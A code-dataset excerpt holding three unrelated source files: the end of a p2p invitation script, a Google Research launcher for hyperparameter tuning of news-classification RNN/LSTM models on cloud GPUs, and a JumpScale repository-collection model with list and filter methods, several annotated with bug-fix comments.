    # Give the invitation 10 seconds; the signal handler exits the process
    # on success, so reaching the lines below means we timed out.
    time.sleep(10)
    print "Error:\n p2p_invite timed out"
    os._exit(0)
apache-2.0
google-research/social_cascades
news/google/launch_optimizer_main.py
1
7283
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Launcher for main.py on PyTorch with GPUs using JobTrialGenerator.

Note that JobTrialGenerator uses CAIP Optimizer for automatic hyperparameter
tuning, which requires the training executable to report measurements via
setting up a CAIP Optimizer client.
"""

import os

from absl import app
from absl import flags
import termcolor

from google3.learning.brain.frameworks import xcloud as xm
from google3.learning.deepmind.xmanager import hyper
from google3.learning.vizier.service import automated_stopping_pb2
from google3.learning.vizier.service import vizier_pb2

GCS_PATH_PREFIX = 'gs://'

FLAGS = flags.FLAGS

flags.DEFINE_string('project_name', 'traceminer', 'name for the project')
flags.DEFINE_string('image_uri', None,
                    'A URI to a prebuilt Docker image, including tag.')
flags.DEFINE_string('base_image', None,
                    'A URI to a prebuilt Docker image, for option2.')
flags.DEFINE_boolean('use_gpu', True, 'use GPU')
flags.DEFINE_string('acc_type', 'v100', 'Accelerator type, v100 or t4')
flags.DEFINE_integer('num_gpus', 1, 'Number of GPUs.')
flags.DEFINE_string('gcs_path_in', None,
                    ('A GCS directory within a bucket to store input'
                     'in gs://bucket/directory format.'))
flags.DEFINE_string('gcs_path_out', None,
                    ('A GCS directory within a bucket to store output '
                     'in gs://bucket/directory format.'))
flags.DEFINE_string('task', 'cat', ('task: sr(subreddit classification), '
                                    'cat(url categorization), '
                                    'fake(fake news detection)'))
flags.DEFINE_string('local_path_in', './fake_input/', 'local path for input')
flags.DEFINE_string('local_path_out', './fake_output/',
                    'local path for output')
flags.DEFINE_string('g_emb', '', 'graph embedding file')
flags.DEFINE_string('seq_file', '', 'post sequence file')
flags.DEFINE_string('balance_df', '', 'the balanced dataset with url ids')

# RNN, LSTM parameters (several of these are overridden per-trial by the
# Vizier search space defined in main() below).
flags.DEFINE_string('model', 'rnn', 'rnn, lstm')
flags.DEFINE_float('train_ratio', 0.8, 'training data ratio')
flags.DEFINE_float('val_ratio', 0.1, 'validation data ratio')
flags.DEFINE_integer('batch_size', 64, 'bacth size for rnn')
flags.DEFINE_integer('hid_dim', 32, 'hidden dimension in RNN, LSTM')
flags.DEFINE_integer('num_layers', 2, 'number of layers in RNN, LSTM')
flags.DEFINE_boolean('bi', False, 'birectional')
flags.DEFINE_float('dropout', 0.8, 'dropout')
flags.DEFINE_integer('epochs', 40, 'epochs')
flags.DEFINE_float('lr', 0.002, 'learning rate')
flags.DEFINE_integer('print_step', 10, 'print step during training')
flags.DEFINE_boolean('save_model', False, 'save model')
flags.DEFINE_string('name', '', 'specify model name')

# Flag specifications.
# FIX: the validators previously used a substring test (GCS_PATH_PREFIX in
# value), which accepted malformed paths such as 'xgs://bucket'. A prefix
# check matches the documented gs://bucket/directory format.
flags.mark_flag_as_required('gcs_path_in')
flags.mark_flag_as_required('gcs_path_out')
flags.register_validator('gcs_path_in',
                         lambda value: value.startswith(GCS_PATH_PREFIX),
                         message=('--gcs_path_in must follow'
                                  'gs://bucket/directory format'))
flags.register_validator('gcs_path_out',
                         lambda value: value.startswith(GCS_PATH_PREFIX),
                         message=('--gcs_path_out must follow'
                                  'gs://bucket/directory format'))


def main(_):
  """Builds the executable and launches a CAIP Optimizer (Vizier) study."""
  # Select the accelerator for each cloud trial.
  if FLAGS.use_gpu:
    accelerator = xm.GPU('nvidia-tesla-' + FLAGS.acc_type.lower(),
                         FLAGS.num_gpus)
  else:
    accelerator = None

  runtime = xm.CloudRuntime(
      cpu=3,
      memory=24,
      accelerator=accelerator,
  )

  # Static arguments forwarded to the training executable; hyperparameters
  # searched by Vizier (model, batch_size, hid_dim, num_layers, lr, dropout,
  # epochs) are injected per-trial and therefore omitted here.
  args = {
      'task': FLAGS.task,
      'gcs_path_in': FLAGS.gcs_path_in,
      'gcs_path_out': FLAGS.gcs_path_out,
      'local_path_in': FLAGS.local_path_in,
      'local_path_out': FLAGS.local_path_out,
      'g_emb': FLAGS.g_emb,
      'seq_file': FLAGS.seq_file,
      'balance_df': FLAGS.balance_df,
      'train_ratio': FLAGS.train_ratio,
      'val_ratio': FLAGS.val_ratio,
      'bi': FLAGS.bi,
      'dropout': FLAGS.dropout,
      'print_step': FLAGS.print_step,
      'save_model': FLAGS.save_model,
      'name': FLAGS.name,
      'use_optimizer': True
  }

  if FLAGS.image_uri:
    # Option 1 This will use a user-defined docker image.
    executable = xm.CloudDocker(
        name=FLAGS.project_name,
        runtime=runtime,
        image_uri=FLAGS.image_uri,
        args=args,
    )
  else:
    # Option 2 This will build a docker image for the user. Set up environment.
    executable = xm.CloudPython(
        name=FLAGS.project_name,
        runtime=runtime,
        project_path=(
            os.path.dirname(os.path.dirname(os.path.realpath(__file__)))),
        module_name='gnns_for_news.main',
        base_image=FLAGS.base_image,
        args=args,
        build_steps=(xm.steps.default_build_steps('gnns_for_news')),
    )

  # Set UNIT_LOG_SCALE to explore more values in the lower range
  # Set UNIT_REVERSE_LOG_SCALE to explore more values in the higher range
  parameters = [
      hyper.get_vizier_parameter_config(
          'model', hyper.categorical(['rnn', 'lstm'])),
      hyper.get_vizier_parameter_config(
          'batch_size', hyper.discrete([16 * k for k in range(1, 6)])),
      hyper.get_vizier_parameter_config(
          'hid_dim', hyper.discrete([16 * k for k in range(3, 10)])),
      hyper.get_vizier_parameter_config(
          'num_layers', hyper.discrete([1, 2])),
      hyper.get_vizier_parameter_config(
          'lr', hyper.interval(0.00001, 0.2), scaling='UNIT_LOG_SCALE'),
      hyper.get_vizier_parameter_config(
          'dropout', hyper.discrete([0.0, 0.15, 0.3, 0.5, 0.7])),
      hyper.get_vizier_parameter_config(
          'epochs', hyper.discrete([5, 10, 20, 30]))
  ]

  # Assemble the Vizier study: search space + objective metric ('valf1',
  # maximized, reported by the training executable).
  vizier_study_config = vizier_pb2.StudyConfig()
  for parameter in parameters:
    vizier_study_config.parameter_configs.add().CopyFrom(parameter)
  metric = vizier_study_config.metric_information.add()
  metric.name = 'valf1'
  metric.goal = vizier_pb2.StudyConfig.GoalType.Value('MAXIMIZE')

  # None early stopping
  early_stopping = automated_stopping_pb2.AutomatedStoppingConfig()
  vizier_study_config.automated_stopping_config.CopyFrom(early_stopping)

  exploration = xm.HyperparameterOptimizer(
      executable=executable,
      max_num_trials=128,
      parallel_evaluations=8,
      vizier_study_config=vizier_study_config
  )
  xm.launch(xm.ExperimentDescription(FLAGS.project_name), exploration)

  # FIX: previously used str.lstrip(GCS_PATH_PREFIX), which strips any run
  # of the characters {'g', 's', ':', '/'} rather than the literal prefix —
  # e.g. 'gs://social/...' became 'ocial/...'. Slice off the exact prefix.
  no_prefix = FLAGS.gcs_path_out[len(GCS_PATH_PREFIX):]
  print()
  print('When your job completes, you will see artifacts in ' +
        termcolor.colored(
            f'https://pantheon.corp.google.com/storage/browser/{no_prefix}',
            color='blue'))


if __name__ == '__main__':
  app.run(main)
apache-2.0
Jumpscale/jumpscale_core8
lib/JumpScale/tools/issuemanager/models/repoCollection.py
1
2535
from JumpScale import j

base = j.data.capnp.getModelBaseClassCollection()


class RepoCollection(base):
    """
    This class represents a collection of repos.
    """

    def list(self, owner=0, name='', id=0, source="", returnIndex=False):
        """
        List all keys of repo model with specified params.

        @param owner int,, id of owner the repo belongs to.
        @param name str,, name of repo.
        @param id int,, repo id in db.
        @param source str,, source of remote database.
        @param returnIndex bool,, return the index used.
        """
        # Normalize unset filters to regex wildcards so each field of the
        # "owner:name:id:source" index key matches anything when omitted.
        # FIX: owner previously only checked "" although its default is 0,
        # so a bare list() searched for the literal owner "0"; treat 0 the
        # same way as the id field does.
        if owner == "" or owner == 0:
            owner = ".*"
        if name == "":
            name = ".*"
        if id == "" or id == 0:
            id = ".*"
        if source == "":
            source = ".*"
        regex = "%s:%s:%s:%s" % (owner, name, id, source)
        return self._index.list(regex, returnIndex=returnIndex)

    def find(self, owner='', name='', id=0, milestone=0, member=0, label='', source=""):
        """
        List all instances of repo model with specified params.

        @param owner int,, id of owner the repo belongs to.
        @param name str,, name of repo.
        @param id int,, repo id in db.
        @param milestone int,, id of milestone in repo.
        @param member int,, id of member in repo.
        @param label str,, label in repo.
        @param source str,, source of remote database.
        """
        # Load every model matching the key-level filters, then narrow the
        # result by the content-level filters below.
        res = []
        for key in self.list(owner=owner, name=name, id=id, source=source):
            res.append(self.get(key))

        # Iterate a reversed copy (res[::-1]) so removing from res while
        # scanning is safe.
        if milestone:
            for model in res[::-1]:
                for milestone_model in model.dictFiltered.get('milestones', []):
                    if milestone == milestone_model['id']:
                        break
                else:
                    res.remove(model)

        if member:
            for model in res[::-1]:
                for member_model in model.dictFiltered.get('members', []):
                    if member == member_model['userKey']:
                        break
                else:
                    res.remove(model)

        if label:
            for model in res[::-1]:
                # A missing or empty 'labels' list also fails this membership
                # test, so the previous extra emptiness check was redundant.
                if label not in model.dictFiltered.get('labels', []):
                    res.remove(model)

        return res

    def getFromId(self, id):
        # NOTE(review): this resolves the key through the "issue_id" index
        # even though this is the repo collection — verify the index name
        # against the capnp schema before relying on it.
        key = self._index.lookupGet("issue_id", id)
        return self.get(key)
apache-2.0